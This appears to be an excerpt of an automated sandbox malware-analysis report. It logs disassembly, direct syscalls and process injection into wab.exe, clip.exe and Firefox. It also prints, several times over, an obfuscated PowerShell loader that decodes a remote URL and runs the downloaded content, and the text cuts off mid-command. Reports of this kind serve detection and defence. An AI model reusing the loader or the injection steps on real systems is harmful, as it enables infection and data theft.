          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04316154 mov eax, dword ptr fs:[00000030h]22_2_04316154
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04316154 mov eax, dword ptr fs:[00000030h]22_2_04316154
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430C156 mov eax, dword ptr fs:[00000030h]22_2_0430C156
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E5152 mov eax, dword ptr fs:[00000030h]22_2_043E5152
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04309148 mov eax, dword ptr fs:[00000030h]22_2_04309148
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04309148 mov eax, dword ptr fs:[00000030h]22_2_04309148
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04309148 mov eax, dword ptr fs:[00000030h]22_2_04309148
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04309148 mov eax, dword ptr fs:[00000030h]22_2_04309148
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A4144 mov eax, dword ptr fs:[00000030h]22_2_043A4144
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A4144 mov eax, dword ptr fs:[00000030h]22_2_043A4144
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A4144 mov ecx, dword ptr fs:[00000030h]22_2_043A4144
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A4144 mov eax, dword ptr fs:[00000030h]22_2_043A4144
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A4144 mov eax, dword ptr fs:[00000030h]22_2_043A4144
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432B1B0 mov eax, dword ptr fs:[00000030h]22_2_0432B1B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043C11A4 mov eax, dword ptr fs:[00000030h]22_2_043C11A4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043C11A4 mov eax, dword ptr fs:[00000030h]22_2_043C11A4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043C11A4 mov eax, dword ptr fs:[00000030h]22_2_043C11A4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043C11A4 mov eax, dword ptr fs:[00000030h]22_2_043C11A4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439019F mov eax, dword ptr fs:[00000030h]22_2_0439019F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439019F mov eax, dword ptr fs:[00000030h]22_2_0439019F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439019F mov eax, dword ptr fs:[00000030h]22_2_0439019F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439019F mov eax, dword ptr fs:[00000030h]22_2_0439019F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04367190 mov eax, dword ptr fs:[00000030h]22_2_04367190
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430A197 mov eax, dword ptr fs:[00000030h]22_2_0430A197
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430A197 mov eax, dword ptr fs:[00000030h]22_2_0430A197
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430A197 mov eax, dword ptr fs:[00000030h]22_2_0430A197
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04350185 mov eax, dword ptr fs:[00000030h]22_2_04350185
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CC188 mov eax, dword ptr fs:[00000030h]22_2_043CC188
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CC188 mov eax, dword ptr fs:[00000030h]22_2_043CC188
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043B71F9 mov esi, dword ptr fs:[00000030h]22_2_043B71F9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043401F8 mov eax, dword ptr fs:[00000030h]22_2_043401F8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E61E5 mov eax, dword ptr fs:[00000030h]22_2_043E61E5
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043351EF mov eax, dword ptr fs:[00000030h]22_2_043351EF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043151ED mov eax, dword ptr fs:[00000030h]22_2_043151ED
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434D1D0 mov eax, dword ptr fs:[00000030h]22_2_0434D1D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434D1D0 mov ecx, dword ptr fs:[00000030h]22_2_0434D1D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E1D0 mov eax, dword ptr fs:[00000030h]22_2_0438E1D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E1D0 mov eax, dword ptr fs:[00000030h]22_2_0438E1D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E1D0 mov ecx, dword ptr fs:[00000030h]22_2_0438E1D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E1D0 mov eax, dword ptr fs:[00000030h]22_2_0438E1D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E1D0 mov eax, dword ptr fs:[00000030h]22_2_0438E1D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E51CB mov eax, dword ptr fs:[00000030h]22_2_043E51CB
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D61C3 mov eax, dword ptr fs:[00000030h]22_2_043D61C3

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Yara matchFile source: amsi64_6600.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6600, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7668, type: MEMORYSTR
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtClose: Direct from: 0x77762B6C
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 2156Jump to behavior
          Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2C00000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 292FA7CJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$ClaJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. usdy$b 